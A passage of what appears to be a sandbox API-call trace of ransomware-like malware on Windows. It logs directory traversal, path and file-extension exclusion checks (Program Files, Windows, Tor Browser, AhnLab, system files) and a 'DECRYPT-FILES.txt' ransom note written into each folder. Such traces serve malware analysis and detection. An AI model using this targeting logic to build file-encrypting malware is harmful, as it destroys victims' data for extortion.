lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0071.376] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0071.376] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0071.376] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0071.376] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0071.376] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0071.376] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0071.376] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.376] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0071.376] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0071.376] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0071.376] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0071.376] lstrlenW (lpString="C:\\") returned 3 [0071.376] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.376] lstrcpyW (in: lpString1=0x3f2f094, lpString2="C:\\" | out: lpString1="C:\\") returned="C:\\" [0071.376] lstrcatW (in: lpString1="C:\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\jkbimi8.tmp") returned="C:\\jkbimi8.tmp" [0071.376] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.376] CreateFileW (lpFileName="C:\\jkbimi8.tmp" (normalized: "c:\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0071.377] CloseHandle (hObject=0x0) returned 0 [0071.377] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.377] FindNextFileW (in: hFindFile=0x5f8ad8, lpFindFileData=0x3f2f8c4 | out: lpFindFileData=0x3f2f8c4*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x625898, cFileName="MSOCache", cAlternateFileName="")) returned 1 [0071.377] lstrcmpW (lpString1="MSOCache", lpString2=".") returned 1 [0071.377] lstrcmpW (lpString1="MSOCache", lpString2="..") returned 1 [0071.377] lstrcatW (in: lpString1="MSOCache", lpString2="\\" | out: lpString1="MSOCache\\") returned="MSOCache\\" [0071.377] lstrcatW (in: lpString1="C:\\", lpString2="MSOCache\\" | out: lpString1="C:\\MSOCache\\") returned="C:\\MSOCache\\" [0071.377] StrStrW (lpFirst="C:\\MSOCache\\", lpSrch="\\Program Files") returned 0x0 [0071.377] StrStrW (lpFirst="C:\\MSOCache\\", lpSrch=":\\Windows") returned 0x0 [0071.377] StrStrW (lpFirst="C:\\MSOCache\\", lpSrch="\\Games\\") returned 0x0 [0071.377] StrStrW (lpFirst="C:\\MSOCache\\", lpSrch="\\Tor Browser\\") returned 0x0 [0071.377] StrStrW (lpFirst="C:\\MSOCache\\", lpSrch="\\ProgramData\\") returned 0x0 [0071.377] StrStrW (lpFirst="C:\\MSOCache\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0071.377] StrStrW (lpFirst="C:\\MSOCache\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0071.377] StrStrW (lpFirst="C:\\MSOCache\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0071.377] StrStrW (lpFirst="C:\\MSOCache\\", lpSrch="\\All Users") returned 0x0 [0071.377] StrStrW (lpFirst="C:\\MSOCache\\", lpSrch="\\IETldCache\\") returned 0x0 [0071.377] StrStrW (lpFirst="C:\\MSOCache\\", lpSrch="\\Local Settings\\") returned 0x0 [0071.377] StrStrW (lpFirst="C:\\MSOCache\\", lpSrch="\\AppData\\Local") returned 0x0 [0071.377] StrStrW (lpFirst="C:\\MSOCache\\", lpSrch="AhnLab") returned 0x0 [0071.377] StrStrW (lpFirst="C:\\MSOCache\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0071.377] lstrlenW (lpString="C:\\MSOCache\\") returned 12 [0071.377] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.377] wsprintfW (in: param_1=0x3f2ee28, param_2="%s\\%s" | out: param_1="C:\\MSOCache\\\\jkbimi8.tmp") returned 24 [0071.378] CreateFileW (lpFileName="C:\\MSOCache\\\\jkbimi8.tmp" (normalized: "c:\\msocache\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x418 [0071.378] lstrlenW (lpString="C:\\MSOCache\\") returned 12 [0071.378] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0071.378] wsprintfW (in: param_1=0x3f2ee28, param_2="%s\\%s" | out: param_1="C:\\MSOCache\\\\DECRYPT-FILES.txt") returned 30 [0071.378] CreateFileW (lpFileName="C:\\MSOCache\\\\DECRYPT-FILES.txt" (normalized: "c:\\msocache\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x41c [0071.378] WriteFile (in: hFile=0x41c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2ee24, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2ee24*=0x23fc, lpOverlapped=0x0) returned 1 [0071.379] CloseHandle (hObject=0x41c) returned 1 [0071.379] lstrlenW (lpString="C:\\MSOCache\\") returned 12 [0071.379] lstrcatW (in: lpString1="C:\\MSOCache\\", lpString2="*" | out: lpString1="C:\\MSOCache\\*") returned="C:\\MSOCache\\*" [0071.379] FindFirstFileW (in: lpFileName="C:\\MSOCache\\*", lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa6c42120, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c42120, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8bd8 [0071.380] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.380] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa6c42120, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c42120, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.380] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.380] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.380] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0071.380] lstrcmpW (lpString1="All Users", lpString2=".") returned 1 [0071.380] lstrcmpW (lpString1="All Users", lpString2="..") returned 1 [0071.380] lstrcatW (in: lpString1="All Users", lpString2="\\" | out: lpString1="All Users\\") returned="All Users\\" [0071.380] lstrcatW (in: lpString1="C:\\MSOCache\\", lpString2="All Users\\" | out: lpString1="C:\\MSOCache\\All Users\\") returned="C:\\MSOCache\\All Users\\" [0071.380] StrStrW (lpFirst="C:\\MSOCache\\All Users\\", lpSrch="\\Program Files") returned 0x0 [0071.380] StrStrW (lpFirst="C:\\MSOCache\\All Users\\", lpSrch=":\\Windows") returned 0x0 [0071.380] StrStrW (lpFirst="C:\\MSOCache\\All Users\\", lpSrch="\\Games\\") returned 0x0 [0071.380] StrStrW (lpFirst="C:\\MSOCache\\All Users\\", lpSrch="\\Tor Browser\\") returned 0x0 [0071.380] StrStrW (lpFirst="C:\\MSOCache\\All Users\\", lpSrch="\\ProgramData\\") returned 0x0 [0071.380] StrStrW (lpFirst="C:\\MSOCache\\All Users\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0071.380] StrStrW (lpFirst="C:\\MSOCache\\All Users\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0071.380] StrStrW (lpFirst="C:\\MSOCache\\All Users\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0071.380] StrStrW (lpFirst="C:\\MSOCache\\All Users\\", lpSrch="\\All Users") returned="\\All Users\\" [0071.380] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa6c42120, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6c42120, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c42120, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0071.380] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0071.380] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa6c42120, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6c42120, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c42120, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0071.380] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0071.380] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0071.380] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0071.380] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0071.380] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0071.380] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0071.380] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0071.380] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0071.380] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0071.380] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0071.380] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.380] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0071.381] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0071.381] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0071.381] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0071.381] lstrlenW (lpString="C:\\MSOCache\\") returned 12 [0071.381] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.381] lstrcpyW (in: lpString1=0x3f2ee18, lpString2="C:\\MSOCache\\" | out: lpString1="C:\\MSOCache\\") returned="C:\\MSOCache\\" [0071.381] lstrcatW (in: lpString1="C:\\MSOCache\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\MSOCache\\jkbimi8.tmp") returned="C:\\MSOCache\\jkbimi8.tmp" [0071.381] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.381] CreateFileW (lpFileName="C:\\MSOCache\\jkbimi8.tmp" (normalized: "c:\\msocache\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0071.381] CloseHandle (hObject=0x0) returned 0 [0071.381] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.381] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa6c42120, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6c42120, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c42120, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0071.381] FindClose (in: hFindFile=0x5f8bd8 | out: hFindFile=0x5f8bd8) returned 1 [0071.381] CloseHandle (hObject=0x418) returned 1 [0071.382] FindNextFileW (in: hFindFile=0x5f8ad8, lpFindFileData=0x3f2f8c4 | out: lpFindFileData=0x3f2f8c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x563d4b80, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x563d4b80, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x814762c0, ftLastWriteTime.dwHighDateTime=0x1d4d5ae, nFileSizeHigh=0x0, nFileSizeLow=0x7ff7c000, dwReserved0=0xa0000003, dwReserved1=0x625898, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0071.382] lstrcmpiW (lpString1="pagefile.sys", lpString2="DECRYPT-FILES.txt") returned 1 [0071.382] lstrcmpiW (lpString1="pagefile.sys", lpString2="autorun.inf") returned 1 [0071.382] lstrcmpiW (lpString1="pagefile.sys", lpString2="boot.ini") returned 1 [0071.382] lstrcmpiW (lpString1="pagefile.sys", lpString2="desktop.ini") returned 1 [0071.382] lstrcmpiW (lpString1="pagefile.sys", lpString2="ntuser.dat") returned 1 [0071.382] lstrcmpiW (lpString1="pagefile.sys", lpString2="iconcache.db") returned 1 [0071.382] lstrcmpiW (lpString1="pagefile.sys", lpString2="bootsect.bak") returned 1 [0071.382] lstrcmpiW (lpString1="pagefile.sys", lpString2="ntuser.dat.log") returned 1 [0071.382] lstrcmpiW (lpString1="pagefile.sys", lpString2="thumbs.db") returned -1 [0071.382] lstrcmpiW (lpString1="pagefile.sys", lpString2="Bootfont.bin") returned 1 [0071.382] lstrlenW (lpString="pagefile.sys") returned 12 [0071.382] lstrcmpiW (lpString1="sys", lpString2="lnk") returned 1 [0071.382] lstrcmpiW (lpString1="sys", lpString2="exe") returned 1 [0071.382] lstrcmpiW (lpString1="sys", lpString2="sys") returned 0 [0071.383] FindNextFileW (in: hFindFile=0x5f8ad8, lpFindFileData=0x3f2f8c4 | out: lpFindFileData=0x3f2f8c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x625898, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0071.383] lstrcmpW (lpString1="PerfLogs", lpString2=".") returned 1 [0071.383] lstrcmpW (lpString1="PerfLogs", lpString2="..") returned 1 [0071.383] lstrcatW (in: lpString1="PerfLogs", lpString2="\\" | out: lpString1="PerfLogs\\") returned="PerfLogs\\" [0071.383] lstrcatW (in: lpString1="C:\\", lpString2="PerfLogs\\" | out: lpString1="C:\\PerfLogs\\") returned="C:\\PerfLogs\\" [0071.383] StrStrW (lpFirst="C:\\PerfLogs\\", lpSrch="\\Program Files") returned 0x0 [0071.383] StrStrW (lpFirst="C:\\PerfLogs\\", lpSrch=":\\Windows") returned 0x0 [0071.383] StrStrW (lpFirst="C:\\PerfLogs\\", lpSrch="\\Games\\") returned 0x0 [0071.383] StrStrW (lpFirst="C:\\PerfLogs\\", lpSrch="\\Tor Browser\\") returned 0x0 [0071.383] StrStrW (lpFirst="C:\\PerfLogs\\", lpSrch="\\ProgramData\\") returned 0x0 [0071.383] StrStrW (lpFirst="C:\\PerfLogs\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0071.383] StrStrW (lpFirst="C:\\PerfLogs\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0071.383] StrStrW (lpFirst="C:\\PerfLogs\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0071.383] StrStrW (lpFirst="C:\\PerfLogs\\", lpSrch="\\All Users") returned 0x0 [0071.383] StrStrW (lpFirst="C:\\PerfLogs\\", lpSrch="\\IETldCache\\") returned 0x0 [0071.383] StrStrW (lpFirst="C:\\PerfLogs\\", lpSrch="\\Local Settings\\") returned 0x0 [0071.383] StrStrW (lpFirst="C:\\PerfLogs\\", lpSrch="\\AppData\\Local") returned 0x0 [0071.383] StrStrW (lpFirst="C:\\PerfLogs\\", lpSrch="AhnLab") returned 0x0 [0071.383] StrStrW (lpFirst="C:\\PerfLogs\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0071.383] lstrlenW (lpString="C:\\PerfLogs\\") returned 12 [0071.383] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.383] wsprintfW (in: param_1=0x3f2ee28, param_2="%s\\%s" | out: param_1="C:\\PerfLogs\\\\jkbimi8.tmp") returned 24 [0071.383] CreateFileW (lpFileName="C:\\PerfLogs\\\\jkbimi8.tmp" (normalized: "c:\\perflogs\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x418 [0071.384] lstrlenW (lpString="C:\\PerfLogs\\") returned 12 [0071.384] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0071.384] wsprintfW (in: param_1=0x3f2ee28, param_2="%s\\%s" | out: param_1="C:\\PerfLogs\\\\DECRYPT-FILES.txt") returned 30 [0071.384] CreateFileW (lpFileName="C:\\PerfLogs\\\\DECRYPT-FILES.txt" (normalized: "c:\\perflogs\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x41c [0071.384] WriteFile (in: hFile=0x41c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2ee24, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2ee24*=0x23fc, lpOverlapped=0x0) returned 1 [0071.385] CloseHandle (hObject=0x41c) returned 1 [0071.385] lstrlenW (lpString="C:\\PerfLogs\\") returned 12 [0071.385] lstrcatW (in: lpString1="C:\\PerfLogs\\", lpString2="*" | out: lpString1="C:\\PerfLogs\\*") returned="C:\\PerfLogs\\*" [0071.385] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\*", lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xa6c68280, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c68280, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8bd8 [0071.385] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.385] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xa6c68280, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c68280, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.385] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.385] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.385] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Admin", cAlternateFileName="")) returned 1 [0071.385] lstrcmpW (lpString1="Admin", lpString2=".") returned 1 [0071.385] lstrcmpW (lpString1="Admin", lpString2="..") returned 1 [0071.386] lstrcatW (in: lpString1="Admin", lpString2="\\" | out: lpString1="Admin\\") returned="Admin\\" [0071.386] lstrcatW (in: lpString1="C:\\PerfLogs\\", lpString2="Admin\\" | out: lpString1="C:\\PerfLogs\\Admin\\") returned="C:\\PerfLogs\\Admin\\" [0071.386] StrStrW (lpFirst="C:\\PerfLogs\\Admin\\", lpSrch="\\Program Files") returned 0x0 [0071.386] StrStrW (lpFirst="C:\\PerfLogs\\Admin\\", lpSrch=":\\Windows") returned 0x0 [0071.386] StrStrW (lpFirst="C:\\PerfLogs\\Admin\\", lpSrch="\\Games\\") returned 0x0 [0071.386] StrStrW (lpFirst="C:\\PerfLogs\\Admin\\", lpSrch="\\Tor Browser\\") returned 0x0 [0071.386] StrStrW (lpFirst="C:\\PerfLogs\\Admin\\", lpSrch="\\ProgramData\\") returned 0x0 [0071.386] StrStrW (lpFirst="C:\\PerfLogs\\Admin\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0071.386] StrStrW (lpFirst="C:\\PerfLogs\\Admin\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0071.386] StrStrW (lpFirst="C:\\PerfLogs\\Admin\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0071.386] StrStrW (lpFirst="C:\\PerfLogs\\Admin\\", lpSrch="\\All Users") returned 0x0 [0071.386] StrStrW (lpFirst="C:\\PerfLogs\\Admin\\", lpSrch="\\IETldCache\\") returned 0x0 [0071.386] StrStrW (lpFirst="C:\\PerfLogs\\Admin\\", lpSrch="\\Local Settings\\") returned 0x0 [0071.386] StrStrW (lpFirst="C:\\PerfLogs\\Admin\\", lpSrch="\\AppData\\Local") returned 0x0 [0071.386] StrStrW (lpFirst="C:\\PerfLogs\\Admin\\", lpSrch="AhnLab") returned 0x0 [0071.386] StrStrW (lpFirst="C:\\PerfLogs\\Admin\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0071.386] lstrlenW (lpString="C:\\PerfLogs\\Admin\\") returned 18 [0071.386] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.386] wsprintfW (in: param_1=0x3f2ebac, param_2="%s\\%s" | out: param_1="C:\\PerfLogs\\Admin\\\\jkbimi8.tmp") returned 30 [0071.386] CreateFileW (lpFileName="C:\\PerfLogs\\Admin\\\\jkbimi8.tmp" (normalized: "c:\\perflogs\\admin\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x420 [0071.386] lstrlenW (lpString="C:\\PerfLogs\\Admin\\") returned 18 [0071.386] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0071.386] wsprintfW (in: param_1=0x3f2ebac, param_2="%s\\%s" | out: param_1="C:\\PerfLogs\\Admin\\\\DECRYPT-FILES.txt") returned 36 [0071.387] CreateFileW (lpFileName="C:\\PerfLogs\\Admin\\\\DECRYPT-FILES.txt" (normalized: "c:\\perflogs\\admin\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x424 [0071.387] WriteFile (in: hFile=0x424, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2eba8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2eba8*=0x23fc, lpOverlapped=0x0) returned 1 [0071.388] CloseHandle (hObject=0x424) returned 1 [0071.388] lstrlenW (lpString="C:\\PerfLogs\\Admin\\") returned 18 [0071.388] lstrcatW (in: lpString1="C:\\PerfLogs\\Admin\\", lpString2="*" | out: lpString1="C:\\PerfLogs\\Admin\\*") returned="C:\\PerfLogs\\Admin\\*" [0071.388] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\Admin\\*", lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xa6c68280, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c68280, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8c18 [0071.388] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.388] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xa6c68280, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c68280, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.388] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.388] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.388] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6c68280, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6c68280, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c68280, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0071.388] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0071.388] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6c68280, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6c68280, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c68280, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, 